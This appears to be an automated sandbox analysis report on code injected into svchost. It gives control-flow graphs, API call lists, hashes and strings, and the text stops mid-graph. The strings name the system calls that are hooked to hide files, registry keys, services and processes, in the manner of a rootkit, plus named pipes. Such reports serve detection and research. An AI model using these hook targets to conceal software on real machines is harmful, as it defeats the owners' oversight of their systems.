                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 18ea53aa43a98f725242ccc54522eb2a995cd4f0bc6055a6e4289cc5d1fcdbce
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: E111A1F161E24B82F760ABA1F8C53F96397A788344F9C41349A4B817B6EF7DC044C600
                                                                      Function 000001FB539C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000001FB539C1628: GetProcessHeap.KERNEL32 ref: 000001FB539C1633
                                                                        • Part of subcall function 000001FB539C1628: HeapAlloc.KERNEL32 ref: 000001FB539C1642
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16B2
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16DF
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C16F9
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1719
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1734
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1754
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C176F
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C178F
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17AA
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C17CA
                                                                      • Sleep.KERNEL32 ref: 000001FB539C1AD7
                                                                      • SleepEx.KERNELBASE ref: 000001FB539C1ADD
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17E5
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1805
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1820
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1840
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C185B
                                                                        • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C187B
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1896
                                                                        • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 7138facc15c73e94db0cfb52103dedfc80ca7baf7500d53e4cc01c5e64d1c001
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 4C3180F520A64B51FF50AB26DAD13F953A6AB48BD0F0C54319E0B877BAEF2CC451C618
                                                                      Function 000001FB5399273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 108 1fb5399273c-1fb539927a4 call 1fb539929d4 * 4 117 1fb539927aa-1fb539927ad 108->117 118 1fb539929b2 108->118 117->118 119 1fb539927b3-1fb539927b6 117->119 120 1fb539929b4-1fb539929d0 118->120 119->118 121 1fb539927bc-1fb539927bf 119->121 121->118 122 1fb539927c5-1fb539927e6 121->122 122->118 124 1fb539927ec-1fb5399280c 122->124 125 1fb53992838-1fb5399283f 124->125 126 1fb5399280e-1fb53992836 124->126 127 1fb53992845-1fb53992852 125->127 128 1fb539928df-1fb539928e6 125->128 126->125 126->126 127->128 131 1fb53992858-1fb5399286a LoadLibraryA 127->131 129 1fb539928ec-1fb53992901 128->129 130 1fb53992992-1fb539929b0 128->130 129->130 132 1fb53992907 129->132 130->120 133 1fb539928ca-1fb539928d2 131->133 134 1fb5399286c-1fb53992878 131->134 137 1fb5399290d-1fb53992921 132->137 133->131 135 1fb539928d4-1fb539928d9 133->135 138 1fb539928c5-1fb539928c8 134->138 135->128 140 1fb53992923-1fb53992934 137->140 141 1fb53992982-1fb5399298c 137->141 138->133 139 1fb5399287a-1fb5399287d 138->139 145 1fb539928a7-1fb539928b7 139->145 146 1fb5399287f-1fb539928a5 139->146 143 1fb53992936-1fb5399293d 140->143 144 1fb5399293f-1fb53992943 140->144 141->130 141->137 147 1fb53992970-1fb53992980 143->147 148 1fb53992945-1fb5399294b 144->148 149 1fb5399294d-1fb53992951 144->149 150 1fb539928ba-1fb539928c1 145->150 146->150 147->140 147->141 148->147 151 1fb53992963-1fb53992967 149->151 152 1fb53992953-1fb53992961 149->152 150->138 151->147 154 1fb53992969-1fb5399296c 151->154 152->147 154->147
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 61dd91bc6a25e48f392e8f6ba260480b8200c95b887252fc9720a6961359b089
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: A661F1B3B0A69987DB548F15D1A07B9B39AF754BA4F1C8131DE9A03798DB38DC52CB00

                                                                      Non-executed Functions

                                                                      Function 000001FB539C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 351 1fb539c2b2c-1fb539c2ba5 call 1fb539e2ce0 354 1fb539c2ee0-1fb539c2f03 351->354 355 1fb539c2bab-1fb539c2bb1 351->355 355->354 356 1fb539c2bb7-1fb539c2bba 355->356 356->354 357 1fb539c2bc0-1fb539c2bc3 356->357 357->354 358 1fb539c2bc9-1fb539c2bd9 GetModuleHandleA 357->358 359 1fb539c2bdb-1fb539c2beb GetProcAddress 358->359 360 1fb539c2bed 358->360 361 1fb539c2bf0-1fb539c2c0e 359->361 360->361 361->354 363 1fb539c2c14-1fb539c2c33 StrCmpNIW 361->363 363->354 364 1fb539c2c39-1fb539c2c3d 363->364 364->354 365 1fb539c2c43-1fb539c2c4d 364->365 365->354 366 1fb539c2c53-1fb539c2c5a 365->366 366->354 367 1fb539c2c60-1fb539c2c73 366->367 368 1fb539c2c83 367->368 369 1fb539c2c75-1fb539c2c81 367->369 370 1fb539c2c86-1fb539c2c8a 368->370 369->370 371 1fb539c2c9a 370->371 372 1fb539c2c8c-1fb539c2c98 370->372 373 1fb539c2c9d-1fb539c2ca7 371->373 372->373 374 1fb539c2d9d-1fb539c2da1 373->374 375 1fb539c2cad-1fb539c2cb0 373->375 376 1fb539c2da7-1fb539c2daa 374->376 377 1fb539c2ed2-1fb539c2eda 374->377 378 1fb539c2cc2-1fb539c2ccc 375->378 379 1fb539c2cb2-1fb539c2cbf call 1fb539c199c 375->379 380 1fb539c2dbb-1fb539c2dc5 376->380 381 1fb539c2dac-1fb539c2db8 call 1fb539c199c 376->381 377->354 377->367 383 1fb539c2d00-1fb539c2d0a 378->383 384 1fb539c2cce-1fb539c2cdb 378->384 379->378 388 1fb539c2dc7-1fb539c2dd4 380->388 389 1fb539c2df5-1fb539c2df8 380->389 381->380 385 1fb539c2d3a-1fb539c2d3d 383->385 386 1fb539c2d0c-1fb539c2d19 383->386 384->383 391 1fb539c2cdd-1fb539c2cea 384->391 393 1fb539c2d3f-1fb539c2d49 call 1fb539c1bbc 385->393 394 1fb539c2d4b-1fb539c2d58 lstrlenW 385->394 386->385 392 1fb539c2d1b-1fb539c2d28 386->392 388->389 396 1fb539c2dd6-1fb539c2de3 388->396 397 1fb539c2dfa-1fb539c2e03 call 1fb539c1bbc 389->397 398 1fb539c2e05-1fb539c2e12 lstrlenW 389->398 399 1fb539c2ced-1fb539c2cf3 391->399 402 1fb539c2d2b-1fb539c2d31 392->402 393->394 409 1fb539c2d93-1fb539c2d98 393->409 404 1fb539c2d5a-1fb539c2d64 394->404 405 1fb539c2d7b-1fb539c2d8d call 1fb539c3844 394->405 406 1fb539c2de6-1fb539c2dec 396->406 397->398 416 1fb539c2e4a-1fb539c2e55 397->416 400 1fb539c2e14-1fb539c2e1e 398->400 401 1fb539c2e35-1fb539c2e3f call 1fb539c3844 398->401 408 1fb539c2cf9-1fb539c2cfe 399->408 399->409 400->401 410 1fb539c2e20-1fb539c2e33 call 1fb539c152c 400->410 411 1fb539c2e42-1fb539c2e44 401->411 402->409 412 1fb539c2d33-1fb539c2d38 402->412 404->405 415 1fb539c2d66-1fb539c2d79 call 1fb539c152c 404->415 405->409 405->411 406->416 417 1fb539c2dee-1fb539c2df3 406->417 408->383 408->399 409->411 410->401 410->416 411->377 411->416 412->385 412->402 415->405 415->409 422 1fb539c2e57-1fb539c2e5b 416->422 423 1fb539c2ecc-1fb539c2ed0 416->423 417->389 417->406 427 1fb539c2e63-1fb539c2e7d call 1fb539c85c0 422->427 428 1fb539c2e5d-1fb539c2e61 422->428 423->377 430 1fb539c2e80-1fb539c2e83 427->430 428->427 428->430 433 1fb539c2e85-1fb539c2ea3 call 1fb539c85c0 430->433 434 1fb539c2ea6-1fb539c2ea9 430->434 433->434 434->423 436 1fb539c2eab-1fb539c2ec9 call 1fb539c85c0 434->436 436->423
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 3ce0a275c11acc5e92f3c7ae4efb9db0a1a550ce48a5a8c3fee84c71d8458c05
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: F1B191B221A69A82EF549F25D4907F9A3A6F748B84F4C5036DE8B677A4DF39CC40C340
                                                                      Function 000001FB539C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 489a7c68e5e93f2be97043befc8e533eee2d989b9a1ceb06d858f03c7cbb19f7
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 59311DB620AB858AEB609F61E8907ED7365F784744F48442ADB4E97BA4EF3CC548C710
                                                                      Function 000001FB539CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 6fdd1fba7bf15b503d1394c2c4db13ffaa122b827706bd4a70a70ebbee7c2285
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 29319376219F8586EB60CF25E8813EE73A1F789754F580125EA9E43B64DF3CC545CB00
                                                                      Function 000001FB539C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: e0d383892e9437e16feb1cfbd0bccaab8c6993bef60af1a4249abde3c73bbe4e
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: CF5160B6209B8686EB54CF62E4853AA77A2F789FC9F484534DE8A47728DF3CC045C700
                                                                      Function 000001FB539C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 6fe1454f222dbdc956f5aa37bac40278d1ba15de22a72ebfa92ae51e802ad3c4
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 1D314DF410AA4BA0FA04EF66E8D26F4A322AB44348F8C5433948B027769F7C8249D350
                                                                      Function 000001FB53996910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 197 1fb53996910-1fb53996916 198 1fb53996918-1fb5399691b 197->198 199 1fb53996951-1fb5399695b 197->199 201 1fb53996945-1fb53996984 call 1fb53996fc0 198->201 202 1fb5399691d-1fb53996920 198->202 200 1fb53996a78-1fb53996a8d 199->200 206 1fb53996a9c-1fb53996ab6 call 1fb53996e54 200->206 207 1fb53996a8f 200->207 219 1fb5399698a-1fb5399699f call 1fb53996e54 201->219 220 1fb53996a52 201->220 204 1fb53996938 __scrt_dllmain_crt_thread_attach 202->204 205 1fb53996922-1fb53996925 202->205 208 1fb5399693d-1fb53996944 204->208 210 1fb53996927-1fb53996930 205->210 211 1fb53996931-1fb53996936 call 1fb53996f04 205->211 217 1fb53996ab8-1fb53996aed call 1fb53996f7c call 1fb53996e1c call 1fb53997318 call 1fb53997130 call 1fb53997154 call 1fb53996fac 206->217 218 1fb53996aef-1fb53996b20 call 1fb53997190 206->218 212 1fb53996a91-1fb53996a9b 207->212 211->208 217->212 229 1fb53996b22-1fb53996b28 218->229 230 1fb53996b31-1fb53996b37 218->230 232 1fb539969a5-1fb539969b6 call 1fb53996ec4 219->232 233 1fb53996a6a-1fb53996a77 call 1fb53997190 219->233 223 1fb53996a54-1fb53996a69 220->223 229->230 234 1fb53996b2a-1fb53996b2c 229->234 235 1fb53996b39-1fb53996b43 230->235 236 1fb53996b7e-1fb53996b94 call 1fb5399268c 230->236 250 1fb539969b8-1fb539969dc call 1fb539972dc call 1fb53996e0c call 1fb53996e38 call 1fb5399ac0c 232->250 251 1fb53996a07-1fb53996a11 call 1fb53997130 232->251 233->200 240 1fb53996c1f-1fb53996c2c 234->240 241 1fb53996b45-1fb53996b4d 235->241 242 1fb53996b4f-1fb53996b5d call 1fb539a5780 235->242 258 1fb53996b96-1fb53996b98 236->258 259 1fb53996bcc-1fb53996bce 236->259 247 1fb53996b63-1fb53996b78 call 1fb53996910 241->247 242->247 262 1fb53996c15-1fb53996c1d 242->262 247->236 247->262 250->251 300 1fb539969de-1fb539969e5 __scrt_dllmain_after_initialize_c 250->300 251->220 272 1fb53996a13-1fb53996a1f call 1fb53997180 251->272 258->259 267 1fb53996b9a-1fb53996bbc call 1fb5399268c call 1fb53996a78 258->267 260 1fb53996bd5-1fb53996bea call 1fb53996910 259->260 261 1fb53996bd0-1fb53996bd3 259->261 260->262 281 1fb53996bec-1fb53996bf6 260->281 261->260 261->262 262->240 267->259 293 1fb53996bbe-1fb53996bc6 call 1fb539a5780 267->293 289 1fb53996a45-1fb53996a50 272->289 290 1fb53996a21-1fb53996a2b call 1fb53997098 272->290 286 1fb53996bf8-1fb53996bff 281->286 287 1fb53996c01-1fb53996c11 call 1fb539a5780 281->287 286->262 287->262 289->223 290->289 299 1fb53996a2d-1fb53996a3b 290->299 293->259 299->289 300->251 301 1fb539969e7-1fb53996a04 call 1fb5399abc8 300->301 301->251
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: f6a05610631161f0791a0f46ca97f481bc5ebb53e9b00542c7e35bf7c6f5f54b
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: A3817EF370F28786FA509B65D4E13F96392A7857A0F5C4135AA47477B6EB3CC8458B00
                                                                      Function 000001FB539CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 304 1fb539cce28-1fb539cce4a GetLastError 305 1fb539cce69-1fb539cce74 FlsSetValue 304->305 306 1fb539cce4c-1fb539cce57 FlsGetValue 304->306 309 1fb539cce76-1fb539cce79 305->309 310 1fb539cce7b-1fb539cce80 305->310 307 1fb539cce59-1fb539cce61 306->307 308 1fb539cce63 306->308 311 1fb539cced5-1fb539ccee0 SetLastError 307->311 308->305 309->311 312 1fb539cce85 call 1fb539cd6cc 310->312 313 1fb539ccef5-1fb539ccf0b call 1fb539cc748 311->313 314 1fb539ccee2-1fb539ccef4 311->314 315 1fb539cce8a-1fb539cce96 312->315 328 1fb539ccf28-1fb539ccf33 FlsSetValue 313->328 329 1fb539ccf0d-1fb539ccf18 FlsGetValue 313->329 317 1fb539ccea8-1fb539cceb2 FlsSetValue 315->317 318 1fb539cce98-1fb539cce9f FlsSetValue 315->318 319 1fb539cceb4-1fb539ccec4 FlsSetValue 317->319 320 1fb539ccec6-1fb539cced0 call 1fb539ccb94 call 1fb539cd744 317->320 322 1fb539ccea1-1fb539ccea6 call 1fb539cd744 318->322 319->322 320->311 322->309 330 1fb539ccf98-1fb539ccf9f call 1fb539cc748 328->330 331 1fb539ccf35-1fb539ccf3a 328->331 333 1fb539ccf1a-1fb539ccf1e 329->333 334 1fb539ccf22 329->334 336 1fb539ccf3f call 1fb539cd6cc 331->336 333->330 337 1fb539ccf20 333->337 334->328 340 1fb539ccf44-1fb539ccf50 336->340 338 1fb539ccf8f-1fb539ccf97 337->338 341 1fb539ccf62-1fb539ccf6c FlsSetValue 340->341 342 1fb539ccf52-1fb539ccf59 FlsSetValue 340->342 344 1fb539ccf80-1fb539ccf8a call 1fb539ccb94 call 1fb539cd744 341->344 345 1fb539ccf6e-1fb539ccf7e FlsSetValue 341->345 343 1fb539ccf5b-1fb539ccf60 call 1fb539cd744 342->343 343->330 344->338 345->343
                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000001FB539CCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCEBC
                                                                      • SetLastError.KERNEL32 ref: 000001FB539CCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000001FB539CECCC,?,?,?,?,000001FB539CBF9F,?,?,?,?,?,000001FB539C7AB0), ref: 000001FB539CCF2C
                                                                        • Part of subcall function 000001FB539CD6CC: HeapAlloc.KERNEL32 ref: 000001FB539CD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF54
                                                                        • Part of subcall function 000001FB539CD744: HeapFree.KERNEL32 ref: 000001FB539CD75A
                                                                        • Part of subcall function 000001FB539CD744: GetLastError.KERNEL32 ref: 000001FB539CD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001FB539D0A6B,?,?,?,000001FB539D045C,?,?,?,000001FB539CC84F), ref: 000001FB539CCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 6d41343913785b7a6c2472a831a74eef6234c9dfd0991a1be6bdcb384e67cf70
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: C8412BF020B24F42FA68A725D6D63F927435B857B0F5C0734A9374A7FADB2C98029A50
                                                                      Function 000001FB539C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 03d7399eea3254e19b5d8266f2eebc46fa5138ef8e7893cb31c7892e277a4139
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: C721567661974583FB10CB25F4853A977A2F789B94F584625DA9A03BB8CF3CC145CB00
                                                                      Function 000001FB539CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 570 1fb539ca544-1fb539ca5ac call 1fb539cb414 573 1fb539caa13-1fb539caa1b call 1fb539cc748 570->573 574 1fb539ca5b2-1fb539ca5b5 570->574 574->573 576 1fb539ca5bb-1fb539ca5c1 574->576 577 1fb539ca5c7-1fb539ca5cb 576->577 578 1fb539ca690-1fb539ca6a2 576->578 577->578 582 1fb539ca5d1-1fb539ca5dc 577->582 580 1fb539ca6a8-1fb539ca6ac 578->580 581 1fb539ca963-1fb539ca967 578->581 580->581 583 1fb539ca6b2-1fb539ca6bd 580->583 585 1fb539ca969-1fb539ca970 581->585 586 1fb539ca9a0-1fb539ca9aa call 1fb539c9634 581->586 582->578 584 1fb539ca5e2-1fb539ca5e7 582->584 583->581 587 1fb539ca6c3-1fb539ca6ca 583->587 584->578 588 1fb539ca5ed-1fb539ca5f7 call 1fb539c9634 584->588 585->573 589 1fb539ca976-1fb539ca99b call 1fb539caa1c 585->589 586->573 599 1fb539ca9ac-1fb539ca9cb call 1fb539c7940 586->599 591 1fb539ca894-1fb539ca8a0 587->591 592 1fb539ca6d0-1fb539ca707 call 1fb539c9a10 587->592 588->599 603 1fb539ca5fd-1fb539ca628 call 1fb539c9634 * 2 call 1fb539c9d24 588->603 589->586 591->586 596 1fb539ca8a6-1fb539ca8aa 591->596 592->591 607 1fb539ca70d-1fb539ca715 592->607 600 1fb539ca8ba-1fb539ca8c2 596->600 601 1fb539ca8ac-1fb539ca8b8 call 1fb539c9ce4 596->601 600->586 606 1fb539ca8c8-1fb539ca8d5 call 1fb539c98b4 600->606 601->600 614 1fb539ca8db-1fb539ca8e3 601->614 638 1fb539ca648-1fb539ca652 call 1fb539c9634 603->638 639 1fb539ca62a-1fb539ca62e 603->639 